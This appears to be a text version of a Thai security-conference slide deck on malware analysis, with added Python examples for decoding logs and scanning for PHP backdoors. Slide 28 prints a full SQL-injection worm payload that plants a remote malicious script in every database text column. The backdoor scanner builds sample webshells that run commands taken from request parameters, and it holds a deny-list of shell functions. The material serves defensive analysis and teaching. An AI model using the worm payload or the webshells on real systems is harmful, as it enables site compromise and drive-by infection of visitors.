Advanced Malware Analysis


  1. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”. Dissecting unwanted programs (malware) with next-level techniques. Speaker: ประธาน พงศ์ทิพย์ฤกษ์ (lecturer), SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F; Section Manager, Senior Information Security Consultant, ACIS Professional Center
  2. Let’s Party Rock: Next Generation of Malware; Malware Analysis; Web Based Malware (Back to the Past, Back to the Future); Lab Challenge
  3. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”: Next Generation of Malware
  4. Old Malware Fashion: executable file (packer, crypter => FUD for just 1 week!!); spyware / adware; rogue security software; virus / worm; USB autorun
  5. Antivirus Detected: Gotcha!!
  6. Virustotal
  7. Virustotal – One Week Later
  8. Anubis: Analyzing Binary File
  9. Latest Malware Fashion: MS Office + Flash Player; PDF Reader; mobile application; social network application; web browser toolbar; web based malware
  10. Bypassing Antivirus: Ninja Techniques
  11. Malware Analysis
  12. CVE-2012-0754: SWF in DOC. “Iran’s Oil and Nuclear Situation.doc” contains Flash instructing it to download and parse a malformed MP4. OS affected: Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux and Solaris. Mobile affected: Adobe Flash Player before 11.1.111.6 on Android 2.x and 3.x, and before 11.1.115.6 on Android 4.x
  13. Document Analysis. Decompiled Flash from the file: This.MyNS.play(“http://208.115.230.76/test.mp4”); Whois – 208.115.230.76: 76-230-115-208.static.reverse.lstn.net; host reachable, 77 ms average, 2 of 4 pings lost; 208.115.192.0 - 208.115.255.255, Limestone Networks, Inc., 400 S. Akard Street Suite 200, Dallas TX 75202, United States
  14. Process Monitor network log
  15. Process Monitor network log
  16. Traffic and C&C (us.exe)
  17. Virus Analysis – us.exe
  18. Target Analysis. Whois – 199.192.156.134: host reachable, 89 ms average; 199.192.152.0 - 199.192.159.255, VPS21 LTD, 38958 S FREMONT BLVD, FREMONT CA 94536, United States; zou, jinhe, +1-408-205-7550
  19. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”: Web Based Malware
  20. Back to the Past
  21. Web Defacement
  22. Zone-H
  23. DDoS Tool
  24. Hack 4 Fun and Profit
  25. Back to the Future
  26. About My Memory. 2008: the Oishi website was hacked without defacement; Kaspersky AV alerted on “a little javascript file”. 2009: SQL injection worms on MSSQL affected many banks in Thailand. 2010: Google and Firefox alerted on malware websites; obfuscated JS was used to bypass AV. 2011: many websites were blocked by Google as malware
  27. SQL Injection Worms: ;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
  28. SQL Injection Worms: ;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST( DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.fengnima.cn/k.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS%20NVARCHAR(4000));EXEC(@S);--
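The statement on slide 28 is what the worm's `CAST(0x… AS NVARCHAR(4000))` literal decodes to. As an added example that is not part of the presentation, the Python below performs that decoding the way an analyst triaging web server logs would: URL-decode the request, pull the hex literal out of the CAST, decode it as UTF-16LE (the MSSQL NVARCHAR encoding) and extract the injected script URL, plus a coarse detection rule for the DECLARE/CAST/EXEC shape. The access log line is constructed; its hex literal is built from the statement on the slide, because the original hex is not reproduced on this page.

```python
"""Decode and detect a CAST(0x... AS NVARCHAR) SQL-injection worm payload in a web log line."""
import re
from urllib.parse import unquote_plus

# Decoded statement as shown on slide 28 (quotes restored). Used here only to
# build the constructed sample; a real log carries the hex form instead.
WORM_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))"
    "+''<script src=http://www.fengnima.cn/k.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def to_nvarchar_hex(sql):
    """MSSQL NVARCHAR is UTF-16LE; the worm shipped the statement as a 0x literal."""
    return "0x" + sql.encode("utf-16-le").hex().upper()


# Constructed Apache-style access log line (IP, timestamp and path are made up).
SAMPLE_LOG = (
    '10.0.0.5 - - [12/Mar/2009:10:15:32 +0700] "GET /news.asp?id=12;DECLARE%20@S%20NVARCHAR(4000);'
    "SET%20@S=CAST(" + to_nvarchar_hex(WORM_SQL) + '%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 5123'
)

CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\s+src=['\"]?([^'\"\s>]+)", re.IGNORECASE)


def decode_cast_payload(log_line):
    """Return (decoded_sql, injected_script_urls), or None if no CAST(0x...) literal is present."""
    decoded = unquote_plus(log_line)
    m = CAST_RE.search(decoded)
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    # NVARCHAR literals are UTF-16LE; a plain VARCHAR literal would be single-byte.
    # Fall back to latin-1 when the byte count is odd or the text is not valid UTF-16.
    try:
        sql = raw.decode("utf-16-le") if len(raw) % 2 == 0 else raw.decode("latin-1")
    except UnicodeDecodeError:
        sql = raw.decode("latin-1")
    return sql, SCRIPT_RE.findall(sql)


def is_worm_hit(log_line):
    """Detection rule: the URL-decoded request declares a variable, CASTs hex into it and EXECs it."""
    d = unquote_plus(log_line).upper()
    return "DECLARE @" in d and "CAST(0X" in d and "EXEC(@" in d


if __name__ == "__main__":
    if is_worm_hit(SAMPLE_LOG):
        sql, urls = decode_cast_payload(SAMPLE_LOG)
        print("injected script URLs:", urls)
        print(sql)
```

The rule in `is_worm_hit` is deliberately broad: the cursor body varies between campaigns, but every variant of this worm family needs DECLARE, a hex CAST and EXEC in one request, so that triple is the stable thing to alert on before decoding the blob for the script host.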
  29. Web Application Backdoor
  30. Web Application Backdoor – FUD
  31. Redbull.php (PHP Backdoor)
  32. Insert Malicious JS into config.inc.php
  33. Crimepack Exploit Kit
  34. Crimeware Exploit Kit
  35. Drive-By Download: visit malicious website; malicious JS executes; web server redirects to malware server; exploit browser / Flash Player; reverse shell to attacker; malware server
  36. Google Malware Alert
  37. Google Diagnostic
  38. http://www.stopbadware.org/home/reviewinfo
  39. http://sitecheck.sucuri.net/scanner
  40. http://sucuri.net/malware/malware-entry-mwhta7
  41. http://sucuri.net/malware/malware-entry-mwhta7
  42. http://www.urlvoid.com
  43. Detect Webserver Backdoor: manual source review; NeoPI – Neohapsis; PHP Shell Scanner; http://25yearsofprogramming.com/php/findmaliciouscode.htm; grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" /var/www/
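The grep on slide 43 flags files that call the listed functions, and slides 30 and 45–46 make the point that "FUD" shells hide the call behind encoding. As an added example that is not part of the presentation or of NeoPI, the Python scanner below applies the same function list and then adds two checks of the kind NeoPI-style tools use: decoding long base64 strings to see whether PHP or `$_GET`/`$_POST` handling falls out, and per-file entropy. The web root and its three files (clean config, plain shell, base64-wrapped shell) are constructed fixtures, and the 5.5 bits/byte entropy threshold is an assumption to tune per site.

```python
"""Scan a web root for likely PHP backdoors: slide 43's function list plus base64 and entropy checks."""
import base64
import math
import os
import re
import tempfile

# Function names from the grep command on slide 43, plus eval/exec/assert which shells also use.
SUSPICIOUS_CALLS = re.compile(
    r"\b(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|eval|exec|assert)\s*\("
)
# Quoted base64 blobs of 40+ chars: long opaque strings are typical of encoded ("FUD") shells.
B64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
SCAN_EXTS = (".php", ".txt", ".asp")
ENTROPY_THRESHOLD = 5.5  # assumption: ordinary PHP source sits around 4.5-5 bits/byte


def shannon_entropy(data):
    """Bits per byte of a bytes object; packed or encoded payloads score higher than source code."""
    if not data:
        return 0.0
    n = len(data)
    counts = {b: data.count(b) for b in set(data)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decodes_to_php(blob):
    """True if a base64 string decodes to text that itself looks like PHP handling request input."""
    try:
        text = base64.b64decode(blob, validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return False
    return bool(re.search(r"\$_(GET|POST|REQUEST|COOKIE)|<\?php|eval\(|system\(", text))


def scan_file(path):
    """Return a list of (indicator, detail) findings for one file."""
    with open(path, "rb") as fh:
        raw = fh.read()
    src = raw.decode("latin-1")
    findings = [("suspicious_call", m.group(1)) for m in SUSPICIOUS_CALLS.finditer(src)]
    for m in B64_BLOB.finditer(src):
        if decodes_to_php(m.group(1)):
            findings.append(("base64_php_payload", m.group(1)[:32] + "..."))
    ent = shannon_entropy(raw)
    if ent > ENTROPY_THRESHOLD:
        findings.append(("high_entropy", f"{ent:.2f}"))
    return findings


def scan_webroot(root):
    """Walk root like grep -R and return {relative_path: findings} for files with any finding."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(SCAN_EXTS):
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    report[os.path.relpath(full, root)] = hits
    return report


def build_sample_webroot():
    """Constructed fixtures in a temp dir: a clean config, a plain shell and a base64-wrapped shell."""
    root = tempfile.mkdtemp(prefix="webroot_")
    clean = "<?php\n$db_host = 'localhost';\n$db_name = 'shop';\n$debug = false;\n"
    plain_shell = "<?php\nif (isset($_GET['c'])) { echo shell_exec($_GET['c']); }\n"
    inner = "<?php @system($_POST['x']); exit;"  # 33 bytes -> 44 base64 chars, above the blob threshold
    fud_shell = '<?php\n$p = "' + base64.b64encode(inner.encode()).decode() + '";\neval(base64_decode($p));\n'
    files = {"inc/config.inc.php": clean, "uploads/cmd.php": plain_shell, "uploads/redbull.php": fud_shell}
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, hits in sorted(scan_webroot(build_sample_webroot()).items()):
        print(path, hits)
```

Every finding here is a lead, not a verdict: `fopen` and `base64_decode` are common in legitimate code, so the value of the scan is in ranking files by how many independent indicators they trip (call list, decodable blob, entropy) and then reading those files first, which is the "manual source review" the slide lists.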
  44. PHP Shell Scanner
  45. Undetectable #1
  46. Undetectable #2
  47. JS De-Obfuscate Tools: Google Chrome Developer Tools; Firebug (Firefox plugin); JSDebug (Firefox plugin); Javascript Deobfuscator (Firefox plugin); Malzilla; Rhino; SpiderMonkey
  48. Simple JS Obfuscate
  49. Simple JS Obfuscate
  50. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”: Lab Challenge
  51. Be Safe. www.cdicconference.com
